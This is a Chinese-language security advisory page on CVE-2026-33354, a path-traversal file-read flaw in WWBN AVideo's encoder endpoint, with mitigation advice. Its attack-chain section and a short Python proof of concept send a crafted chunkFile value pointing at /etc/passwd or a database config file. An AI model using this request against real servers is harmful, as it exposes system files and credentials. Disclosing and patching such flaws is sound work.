IPBUF安全漏洞报告
English
CVE-2026-33354 CVSS 7.6 高危

CVE-2026-33354: AVideo平台任意文件读取漏洞

披露日期: 2026-03-23
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-33354
漏洞类型
任意文件读取
CVSS评分
7.6 高危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
WWBN AVideo

相关标签

任意文件读取WWBN AVideoCVE-2026-33354路径遍历

漏洞概述

WWBN AVideo是一个开源视频平台。在26.0及以下版本中,`/objects/aVideoEncoder.json.php`接口存在安全漏洞。攻击者可通过控制`chunkFile`参数,传入任意本地文件路径(如配置文件、日志等)。系统会将该文件复制到攻击者的公共视频目录,导致未授权的敏感文件读取。

技术细节

该漏洞的核心在于`POST /objects/aVideoEncoder.json.php`接口未能正确验证`chunkFile`参数。虽然该参数本意用于指定分块上传的临时文件路径,但`isValidURLOrPath()`验证函数存在逻辑缺陷,允许攻击者指定服务器上的任意本地文件系统路径,包括Web根目录、临时目录和视频目录等关键位置,仅简单地过滤了`.php`扩展名。对于经过身份认证的攻击者(即便是低权限的上传者),可以利用此漏洞发起攻击。当攻击者编辑视频并发送特制的POST请求时,系统会将攻击者指定的本地敏感文件(如数据库配置文件)直接复制到攻击者拥有读写权限的公共视频存储路径中。随后,攻击者可以通过生成的公共URL直接下载该文件,从而实现任意文件读取,严重威胁服务器机密性。

攻击链分析

STEP 1
1. 获取凭证
攻击者注册或通过其他方式获取WWBN AVideo平台的低权限账号凭证。
STEP 2
2. 发起恶意请求
攻击者登录后,编辑自己的视频,拦截并修改发送至`/objects/aVideoEncoder.json.php`的POST请求,将`chunkFile`参数值修改为服务器上的敏感文件路径(如`/var/www/html/config.php`)。
STEP 3
3. 文件复制
由于后端验证逻辑缺陷,服务器将攻击者指定的敏感文件复制到了攻击者的公共视频存储目录中。
STEP 4
4. 数据窃取
攻击者通过返回的信息或直接访问公共视频URL,下载并查看窃取的敏感文件内容。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # PoC for CVE-2026-33354: AVideo Arbitrary File Read # Requires authentication (low privileges) target_host = "http://avideo.example.com" login_url = f"{target_host}/userLogin" upload_url = f"{target_host}/objects/aVideoEncoder.json.php" # Attacker credentials credentials = { "user": "attacker", "pass": "password" } # 1. Establish session session = requests.Session() session.post(login_url, data=credentials) # 2. Exploit vulnerable endpoint # The 'chunkFile' parameter accepts arbitrary local paths (e.g., /etc/passwd) # The server copies this file to the attacker's video directory. payload = { "chunkFile": "/etc/passwd", "action": "save" } response = session.post(upload_url, data=payload) if response.status_code == 200: print("[+] Exploit sent successfully.") print("[+] Check the attacker's video storage directory for the downloaded file.") else: print(f"[-] Exploit failed. Status code: {response.status_code}")

影响范围

WWBN AVideo <= 26.0

防御指南

临时缓解措施
建议立即应用官方提供的补丁进行升级。如果暂时无法升级,应严格限制普通用户的文件上传和编辑权限,并检查服务器日志中是否存在异常的文件复制请求。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表